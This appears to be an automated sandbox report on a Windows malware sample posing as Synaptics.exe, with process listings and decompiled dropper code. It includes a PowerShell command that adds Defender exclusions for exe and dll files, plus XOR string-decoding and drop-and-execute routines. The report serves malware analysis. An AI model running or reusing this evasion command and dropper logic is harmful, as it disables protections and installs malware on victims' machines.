                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.348826366.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.285408477.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.361096693.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                          Start time:04:37:54
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
                                                                                                                                                                                                                          Imagebase:0x1010000
                                                                                                                                                                                                                          File size:430592 bytes
                                                                                                                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                          Start time:04:38:02
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                          File size:771584 bytes
                                                                                                                                                                                                                          MD5 hash:2A1D1C20CCA885322254DD2A22F51097
                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000C.00000000.310907115.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                          Reputation:low

                                                                                                                                                                                                                          Target ID:13
                                                                                                                                                                                                                          Start time:04:38:06
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                          Imagebase:0x1130000
                                                                                                                                                                                                                          File size:27110184 bytes
                                                                                                                                                                                                                          MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:24
                                                                                                                                                                                                                          Start time:04:38:32
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904
                                                                                                                                                                                                                          Imagebase:0xc40000
                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                          Start time:04:38:39
                                                                                                                                                                                                                          Start date:27/05/2022
                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052
                                                                                                                                                                                                                          Imagebase:0xc40000
                                                                                                                                                                                                                          File size:434592 bytes
                                                                                                                                                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                            Execution Coverage:64.4%
                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                            Signature Coverage:4.8%
                                                                                                                                                                                                                            Total number of Nodes:42
                                                                                                                                                                                                                            Total number of Limit Nodes:2

                                                                                                                                                                                                                            Callgraph

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 44%
                                                                                                                                                                                                                            			_entry_() {
                                                                                                                                                                                                                            				void _v8;
                                                                                                                                                                                                                            				intOrPtr* _v12;
                                                                                                                                                                                                                            				int _t25;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				memset( &_v8, 0, 4);
                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00401483);
                                                                                                                                                                                                                            				_push(1);
                                                                                                                                                                                                                            				L00401618();
                                                                                                                                                                                                                            				_push(0x30000);
                                                                                                                                                                                                                            				_push(0x10000);
                                                                                                                                                                                                                            				L00401620();
                                                                                                                                                                                                                            				_v12 = __imp____argc;
                                                                                                                                                                                                                            				_push( &_v8);
                                                                                                                                                                                                                            				_push( *0x539000);
                                                                                                                                                                                                                            				_push(__imp___environ);
                                                                                                                                                                                                                            				_push(__imp____argv);
                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                            				L00401628();
                                                                                                                                                                                                                            				_v12 = __imp____argc;
                                                                                                                                                                                                                            				_t25 = E0040142F( *_v12,  *__imp____argv,  *__imp___environ); // executed
                                                                                                                                                                                                                            				exit(_t25); // executed
                                                                                                                                                                                                                            				return _t25;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3649950142-0
                                                                                                                                                                                                                            • Opcode ID: 306bfeee29cfac2267a084103dcadb822dcfbe0d1eff0ee721aad76adfaa38c9
                                                                                                                                                                                                                            • Instruction ID: 3a75800fd6015d03e9ab69df35ae10412dacb439bc0b652db34ec73a0e271524
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 306bfeee29cfac2267a084103dcadb822dcfbe0d1eff0ee721aad76adfaa38c9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 021112F5E002046BCB44EBA8EC85F5A77BCA758304F144879F805E73A1E939EA488765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00401193() {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                                                                                            				void _v16;
                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				void _v32;
                                                                                                                                                                                                                            				char _v1292;
                                                                                                                                                                                                                            				char _v2552;
                                                                                                                                                                                                                            				signed int _v2556;
                                                                                                                                                                                                                            				char* _v2560;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t120;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				E004010EC(0, E00401000(0x402024, 0xf8)); // executed
                                                                                                                                                                                                                            				memset( &_v16, 0, 0xc);
                                                                                                                                                                                                                            				_v16 = 0x40211d;
                                                                                                                                                                                                                            				_v12 = 0x402122;
                                                                                                                                                                                                                            				_v8 = 0x402133;
                                                                                                                                                                                                                            				memset( &_v32, 0, 0x10);
                                                                                                                                                                                                                            				_t124 = _t120 + 0x28;
                                                                                                                                                                                                                            				_v32 = 0x10;
                                                                                                                                                                                                                            				_v28 = 1;
                                                                                                                                                                                                                            				_v24 = 0x136200;
                                                                                                                                                                                                                            				_v2556 = 0;
                                                                                                                                                                                                                            				while(_v2556 < 1) {
                                                                                                                                                                                                                            					_v2560 = getenv( *( &_v16 + _v2556 * 0xc));
                                                                                                                                                                                                                            					sprintf( &_v1292, 0x538334, _v2560, E00401000(( &_v16 + _v2556 * 0xc)[1],  *((intOrPtr*)( &_v32 + (_v2556 << 4)))));
                                                                                                                                                                                                                            					_t74 = E00401000(( &_v16 + _v2556 * 0xc)[2],  *((intOrPtr*)( &_v32 + (_v2556 << 4) + 8))); // executed
                                                                                                                                                                                                                            					E0040109F( &_v1292, _t74,  *((intOrPtr*)( &_v32 + (_v2556 << 4) + 8))); // executed
                                                                                                                                                                                                                            					_t124 = _t124 + 0x30;
                                                                                                                                                                                                                            					if( *((intOrPtr*)( &_v32 + (_v2556 << 4) + 4)) != 0) {
                                                                                                                                                                                                                            						sprintf( &_v2552, "%s \"\" \"%s\"", E00401000(0x538345, 0xd),  &_v1292);
                                                                                                                                                                                                                            						E004010EC(0,  &_v2552); // executed
                                                                                                                                                                                                                            						_t124 = _t124 + 0x20;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v2556 = _v2556 + 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00401000: strlen.MSVCRT ref: 00401016
                                                                                                                                                                                                                              • Part of subcall function 00401000: malloc.MSVCRT ref: 00401026
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 00401106
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 0040111E
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CreateProcessA.KERNEL32(00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401162
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401174
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(004011BD,?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 0040117D
                                                                                                                                                                                                                            • memset.MSVCRT ref: 004011D0
                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401200
                                                                                                                                                                                                                            • getenv.MSVCRT ref: 00401264
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 004012B9
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fopen.MSVCRT ref: 004010B3
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fwrite.MSVCRT ref: 004010D0
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fclose.MSVCRT ref: 004010DF
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040135F
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: memset$CloseHandlesprintf$CreateProcessfclosefopenfwritegetenvmallocstrlen
                                                                                                                                                                                                                            • String ID: "!@$$ @$%s "" "%s"$%s\%s$3!@$Temp
                                                                                                                                                                                                                            • API String ID: 1612466341-405523733
                                                                                                                                                                                                                            • Opcode ID: a6a698ba76dac6e8dbd8dd0450d1d6d27ecad77ed7286cff01d4059f278791b2
                                                                                                                                                                                                                            • Instruction ID: ddd26f67f9fce1da615c8cf7e772ab87997cd42ef7c819f88f068c8a881685b0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6a698ba76dac6e8dbd8dd0450d1d6d27ecad77ed7286cff01d4059f278791b2
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2A5141F1E001099BEB54DB9CDC41FAE73ADDB44309F0445BAF419F7392EA38AA848B54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040123F() {
                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					 *(_t91 - 0x9f8) =  *(_t91 - 0x9f8) + 1;
                                                                                                                                                                                                                            					if( *(_t91 - 0x9f8) >= 1) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t91 - 0x9fc)) = getenv( *(_t91 - 0xc +  *(_t91 - 0x9f8) * 0xc));
                                                                                                                                                                                                                            					sprintf(_t91 - 0x508, 0x538334,  *((intOrPtr*)(_t91 - 0x9fc)), E00401000((_t91 - 0xc +  *(_t91 - 0x9f8) * 0xc)[1],  *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4)))));
                                                                                                                                                                                                                            					_t47 = E00401000((_t91 - 0xc +  *(_t91 - 0x9f8) * 0xc)[2],  *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4) + 8))); // executed
                                                                                                                                                                                                                            					E0040109F(_t91 - 0x508, _t47,  *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4) + 8))); // executed
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t91 - 0x1c + ( *(_t91 - 0x9f8) << 4) + 4)) != 0) {
                                                                                                                                                                                                                            						sprintf(_t91 - 0x9f4, "%s \"\" \"%s\"", E00401000(0x538345, 0xd), _t91 - 0x508);
                                                                                                                                                                                                                            						E004010EC(0, _t91 - 0x9f4); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L6:
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}






                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • getenv.MSVCRT ref: 00401264
                                                                                                                                                                                                                              • Part of subcall function 00401000: strlen.MSVCRT ref: 00401016
                                                                                                                                                                                                                              • Part of subcall function 00401000: malloc.MSVCRT ref: 00401026
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 004012B9
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fopen.MSVCRT ref: 004010B3
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fwrite.MSVCRT ref: 004010D0
                                                                                                                                                                                                                              • Part of subcall function 0040109F: fclose.MSVCRT ref: 004010DF
                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040135F
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 00401106
                                                                                                                                                                                                                              • Part of subcall function 004010EC: memset.MSVCRT ref: 0040111E
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CreateProcessA.KERNEL32(00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401162
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401174
                                                                                                                                                                                                                              • Part of subcall function 004010EC: CloseHandle.KERNEL32(004011BD,?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 0040117D
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandlememsetsprintf$CreateProcessfclosefopenfwritegetenvmallocstrlen
                                                                                                                                                                                                                            • String ID: %s "" "%s"$%s\%s
                                                                                                                                                                                                                            • API String ID: 29280083-2882565225
                                                                                                                                                                                                                            • Opcode ID: fc8c38f793bc2ef48c1ce623ce7ecbf072c9cb9eb44e7a571caf3f9457dd4aa9
                                                                                                                                                                                                                            • Instruction ID: 5c656854deae039cce70bbff5f12d1a06f7a4f27785052f6a30d2ba00a044d21
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc8c38f793bc2ef48c1ce623ce7ecbf072c9cb9eb44e7a571caf3f9457dd4aa9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD3150F1E011169BEB58DB98CC91FBE73B9EB44305F0445B9F016F7252EA38AA84CB54
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 41 4010ec-40116a memset * 2 CreateProcessA 42 401170-401187 CloseHandle * 2 41->42 43 40118c 41->43 44 401191-401192 42->44 43->44
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004010EC(CHAR* _a4, CHAR* _a8) {
                                                                                                                                                                                                                            				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                                                                                            				struct _STARTUPINFOA _v88;
                                                                                                                                                                                                                            				int _t29;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				memset( &_v88, 0, 0x44);
                                                                                                                                                                                                                            				memset( &_v20, 0, 0x10);
                                                                                                                                                                                                                            				_v88.cb = 0x44;
                                                                                                                                                                                                                            				_t29 = CreateProcessA(_a4, _a8, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20); // executed
                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				CloseHandle(_v20);
                                                                                                                                                                                                                            				CloseHandle(_v20.hThread);
                                                                                                                                                                                                                            				return 1;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401106
                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040111E
                                                                                                                                                                                                                            • CreateProcessA.KERNEL32(00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401162
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 00401174
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(004011BD,?,00000000,004011BD,08000000,08000000,08000000,08000000,?,?,?,?), ref: 0040117D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandlememset$CreateProcess
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3808871499-0
                                                                                                                                                                                                                            • Opcode ID: 3a54ed037061dab525dbd650e8bbdaa9cbf831eb218dd4639b6558646f997316
                                                                                                                                                                                                                            • Instruction ID: fbed1b3901432369c809b4390b2605daaf7d3aaa2b2321e4495c261506c4ab80
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a54ed037061dab525dbd650e8bbdaa9cbf831eb218dd4639b6558646f997316
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D0196B6A001087BEB50D6ECCC45F9B73AC9B48344F244436B61AFB2D1E53CE94487A9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 45 40109f-4010eb fopen fwrite fclose
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0040109F(char* _a4, void* _a8, int _a12) {
                                                                                                                                                                                                                            				struct _IO_FILE* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				struct _IO_FILE* _t11;
                                                                                                                                                                                                                            				int _t16;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t11 = fopen(_a4, "wb"); // executed
                                                                                                                                                                                                                            				_v8 = _t11;
                                                                                                                                                                                                                            				_t16 = fwrite(_a8, _a12, 1, _v8); // executed
                                                                                                                                                                                                                            				_v12 = _t16;
                                                                                                                                                                                                                            				fclose(_v8); // executed
                                                                                                                                                                                                                            				return _v12;
                                                                                                                                                                                                                            			}







                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: fclosefopenfwrite
                                                                                                                                                                                                                            • String ID: ! @
                                                                                                                                                                                                                            • API String ID: 699583605-630624503
                                                                                                                                                                                                                            • Opcode ID: 218f2faaa4636afcb94cea61386515247506180f3d78cbfdf009abea41c2d677
                                                                                                                                                                                                                            • Instruction ID: b5f4748816796eb7b9a6c2adde2f6661763ad3dc1d466896b85c981b43dabe2d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 218f2faaa4636afcb94cea61386515247506180f3d78cbfdf009abea41c2d677
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F0A5F5E00208BBDF50EAADDD86E8E77ECAB08304F004465F909E7281E638EA548765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            control_flow_graph 46 401000-401045 strlen malloc 47 401048-401050 46->47 48 401056-401098 47->48 49 40109a-40109e 47->49 48->47
                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E00401000(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                                                                            				char* _v24;
                                                                                                                                                                                                                            				signed char* _v28;
                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v8 = "=wd91b(abwhpyy0ahk/uujs72.pb.:n9";
                                                                                                                                                                                                                            				_v12 = strlen(_v8);
                                                                                                                                                                                                                            				_t34 = malloc(_a8 + 1); // executed
                                                                                                                                                                                                                            				_v16 = _t34;
                                                                                                                                                                                                                            				 *((char*)(_v16 + _a8)) = 0;
                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                            				while(_v20 < _a8) {
                                                                                                                                                                                                                            					_v24 = _v16 + _v20;
                                                                                                                                                                                                                            					_v28 = _a4 + _v20;
                                                                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                                                                            					 *_v24 =  *_v28 ^ _v8[_v20 % _v12];
                                                                                                                                                                                                                            					_v20 = _v20 + 1;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v16;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • =wd91b(abwhpyy0ahk/uujs72.pb.:n9, xrefs: 0040100A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.268012168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268008916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268016071.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.268897086.000000000053A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: mallocstrlen
                                                                                                                                                                                                                            • String ID: =wd91b(abwhpyy0ahk/uujs72.pb.:n9
                                                                                                                                                                                                                            • API String ID: 770973918-3890356719
                                                                                                                                                                                                                            • Opcode ID: 02f93a43be42bd8e7080bbc0469d4024ec066242a770b7b48e3d2893a50011d7
                                                                                                                                                                                                                            • Instruction ID: 126bdaef979334948cc799e95c619292300e0bd5fddb62597c62829b26c3098e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 02f93a43be42bd8e7080bbc0469d4024ec066242a770b7b48e3d2893a50011d7
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14112EB0E00249DFCF04CFACC891AAEBBF1AF49304F14846AE456F7391D634AA05CB55
